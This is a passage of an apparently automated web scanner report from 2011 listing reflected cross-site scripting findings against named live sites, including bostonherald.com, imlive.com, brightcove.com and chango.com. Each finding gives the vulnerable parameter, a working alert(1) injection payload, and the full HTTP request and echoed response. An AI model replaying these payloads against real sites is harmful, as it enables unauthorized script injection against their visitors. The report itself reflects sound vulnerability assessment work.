<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<script language="Javascript">
// Ajax search

page($('search_opt_type').options[$('search_opt_type').selectedIndex].value,'1','','search','Annette Beninge99ef</script><script>alert(1)</script>6ffe388eb75');
//pageTracker._trackPageview('/search/index.bg?&order=&page=1');
location.hash='articleFull';
</script>
...[SNIP]...

4.219. http://bostonherald.com/track/inside_track/view.bg [format parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/view.bg

Issue detail

The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6964e'-alert(1)-'6dd42dc7131 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /track/inside_track/view.bg?articleid=1312557&format=comments6964e'-alert(1)-'6dd42dc7131&srvc=track&position=2 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:23:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<script type="text/javascript">

       // Converts the GET params to a JSON object
       GET_Params = 'articleid=1312557&format=comments6964e'-alert(1)-'6dd42dc7131&srvc=track&position=2'.toQueryParams();

       //alert(Object.inspect(GET_Params));
       //-----------------------------------------------------------------
       function updatePage(key,val) {
       //------
...[SNIP]...

4.220. http://bostonherald.com/track/star_tracks/view.bg [format parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/star_tracks/view.bg

Issue detail

The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4303'-alert(1)-'7c0f4b2ce6d was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /track/star_tracks/view.bg?articleid=1312549&format=commentsc4303'-alert(1)-'7c0f4b2ce6d&srvc=track&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:23:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<script type="text/javascript">

       // Converts the GET params to a JSON object
       GET_Params = 'articleid=1312549&format=commentsc4303'-alert(1)-'7c0f4b2ce6d&srvc=track&position=3'.toQueryParams();

       //alert(Object.inspect(GET_Params));
       //-----------------------------------------------------------------
       function updatePage(key,val) {
       //------
...[SNIP]...

4.221. http://br.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://br.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34723"><a>3f71d325883 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?34723"><a>3f71d325883=1 HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=u0zu13bemdfyxq455qlm1uml; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=u0zu13bemdfyxq455qlm1uml; path=/; HttpOnly
Set-Cookie: spvdr=vd=04dc6090-bd1f-4d6e-bf28-729633a25e9a&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:51 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:51 GMT
Connection: close
Content-Length: 18835
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||34723"><a>3f71d325883~1');return false;">
...[SNIP]...

4.222. http://br.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://br.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a910'-alert(1)-'8200d22e901 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?3a910'-alert(1)-'8200d22e901=1 HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=uvklmduf1vd4t1rxzfvo2g45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=uvklmduf1vd4t1rxzfvo2g45; path=/; HttpOnly
Set-Cookie: spvdr=vd=b00d0ff4-12cf-4179-8b1b-240f4a4d01b6&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:53 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:52 GMT
Connection: close
Content-Length: 19010
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=br.imlive.com&ul=/?3a910'-alert(1)-'8200d22e901=1&qs=3a910'-alert(1)-'8200d22e901=1&qs=3a910'-alert(1)-'8200d22e901=1&iy=dallas&id=44&iu=1&vd=b00d0ff4-12cf-4179-8b1b-240f4a4d01b6';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.223. http://br.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://br.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6051e"><script>alert(1)</script>af1af9033d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6051e"><script>alert(1)</script>af1af9033d9=1 HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:58 GMT
Connection: close
Content-Length: 21217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/?6051e"><script>alert(1)</script>af1af9033d9=1');return false;">
...[SNIP]...

4.224. http://br.imlive.com/waccess/ [cbname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://br.imlive.com
Path:	/waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6113a"><script>alert(1)</script>fb907eb99cc was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=6113a"><script>alert(1)</script>fb907eb99cc&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:10 GMT
Connection: close
Content-Length: 23409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=6113a"><script>alert(1)</script>fb907eb99cc&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.225. http://br.imlive.com/waccess/ [from parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://br.imlive.com
Path:	/waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d687a"><script>alert(1)</script>9d2e569021a was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d687a"><script>alert(1)</script>9d2e569021a&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:16 GMT
Connection: close
Content-Length: 23409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d687a"><script>alert(1)</script>9d2e569021a&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.226. http://br.imlive.com/waccess/ [gotopage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://br.imlive.com
Path:	/waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 661d9'style%3d'x%3aexpression(alert(1))'99e183046e6 was submitted in the gotopage parameter. This input was echoed as 661d9'style='x:expression(alert(1))'99e183046e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=661d9'style%3d'x%3aexpression(alert(1))'99e183046e6 HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:02 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ibr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQSSRDRC=BDNHCJMAKNOJHLDBKMBBNOGJ; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:02 GMT
Connection: close
Content-Length: 8329
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=br.imlive.com&ul=/waccess/661d9'style='x:expression(alert(1))'99e183046e6/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://br.imlive.com:80/waccess/661d9'style='x:expression(alert(1))'99e183046e6/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.227. http://br.imlive.com/waccess/ [promocode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://br.imlive.com
Path:	/waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfad6"><script>alert(1)</script>6b350e8e83c was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583cfad6"><script>alert(1)</script>6b350e8e83c&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:01 GMT
Connection: close
Content-Length: 23409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583cfad6"><script>alert(1)</script>6b350e8e83c&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.228. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.brightcove.com
Path:	/services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 5b13c<script>alert(1)</script>3acf57ed041 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ%2E%2E,AAAAE6Rs9lk%2E,SN2uQ1cpwui9Aq_exhx7aflP2FnHceiC HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=370&height=300&flashID=myExperience766783859001&bgcolor=%23FFFFFF&wmode=transparent&isVid=true&dynamicStreaming=true&playerID=657985641001&playerKey=AQ%252E%252E%2CAAAAE6Rs9lk%252E%2CSN2uQ1cpwui9Aq_exhx7aflP2FnHceiC&%40videoPlayer=766783859001&autoStart=
content-type: application/x-amf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 748

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1..... ...Q7f55be63070fb01af9305722d79174b22631affb
cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:57:44 GMT
Server:
Content-Length: 5270

......../1/onResult.....}.
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
B3.l.Y...eAQ~~,AAAAE6Rs9lk~,SN2uQ1cpwui9Aq_exhx7aflP2FnHceiC. ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO..mediaId.componentRefId.playerId type.mediaDTO
..BfP.%' ..ivideoPlayer5b13c<script>alert(1)</script>3acf57ed041..........
.SOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription
...[SNIP]...

4.229. http://c.chango.com/collector/tag.js [partnerId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.chango.com
Path:	/collector/tag.js

Issue detail

The value of the partnerId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85054'%3balert(1)//7c6ede70f9f was submitted in the partnerId parameter. This input was echoed as 85054';alert(1)//7c6ede70f9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /collector/tag.js?_r=1296236606219&partnerId=oversee85054'%3balert(1)//7c6ede70f9f&siteID=NpAF2Tti8P0PKjSDdT3nmi2mz&logSearch=true&referrerURL=http%3A%2F%2Feztext.com%2F&q=mass%20texting HTTP/1.1
Host: c.chango.com
Proxy-Connection: keep-alive
Referer: http://searchportal.information.com/?o_id=131972&domainname=eztext.com&popunder=off&exit=off&adultfiler=off
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:50 GMT
Content-Type: text/javascript
Connection: close
Server: TornadoServer/1.1
Etag: "566609a3d6eaa799dec1a9fc9ae77e4273324fd9"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _t=2d1cbd00-2b4b-11e0-9a94-00259009a9c2; Domain=chango.com; expires=Tue, 26 Jan 2021 01:57:50 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Fri, 29 Apr 2011 01:57:50 GMT; Path=/
Content-Length: 1331

(new Image()).src = 'http://tag.admeld.com/match?admeld_adprovider_id=333&external_user_id=' + encodeURIComponent('2d1cbd00-2b4b-11e0-9a94-00259009a9c2');(new Image()).src = 'http://bid.openx.net/cm?p
...[SNIP]...
c = 'http://cm.g.doubleclick.net/pixel?nid=chango&referrerURL=' + encodeURIComponent("http://eztext.com/") + '&token=' + encodeURIComponent("2d1cbd00-2b4b-11e0-9a94-00259009a9c2") + '&partnerId=oversee85054';alert(1)//7c6ede70f9f';
})();(new Image()).src = 'http://ads.adbrite.com/adserver/vdi/806205?r=http%3A//c.chango.com/collector/mapping%3Fpartner%3DAdBrite%26chango_uid%3D2d1cbd00-2b4b-11e0-9a94-00259009a9c2%26partner_uid%3
...[SNIP]...

4.230. http://c.chango.com/collector/tag.js [referrerURL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.chango.com
Path:	/collector/tag.js

Issue detail

The value of the referrerURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 543f3"%3balert(1)//6db19040e31 was submitted in the referrerURL parameter. This input was echoed as 543f3";alert(1)//6db19040e31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /collector/tag.js?_r=1296236606219&partnerId=oversee&siteID=NpAF2Tti8P0PKjSDdT3nmi2mz&logSearch=true&referrerURL=http%3A%2F%2Feztext.com%2F543f3"%3balert(1)//6db19040e31&q=mass%20texting HTTP/1.1
Host: c.chango.com
Proxy-Connection: keep-alive
Referer: http://searchportal.information.com/?o_id=131972&domainname=eztext.com&popunder=off&exit=off&adultfiler=off
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:50 GMT
Content-Type: text/javascript
Connection: close
Server: TornadoServer/1.1
Etag: "1374605d644743af6028f557ff6b098ab9a18c9d"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _t=2d47aca4-2b4b-11e0-abf9-00259009a9e4; Domain=chango.com; expires=Tue, 26 Jan 2021 01:57:50 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Fri, 29 Apr 2011 01:57:50 GMT; Path=/
Content-Length: 1331

(new Image()).src = 'http://tag.admeld.com/match?admeld_adprovider_id=333&external_user_id=' + encodeURIComponent('2d47aca4-2b4b-11e0-abf9-00259009a9e4');(new Image()).src = 'http://bid.openx.net/cm?p
...[SNIP]...
d=' + encodeURIComponent('2d47aca4-2b4b-11e0-abf9-00259009a9e4');(function() {
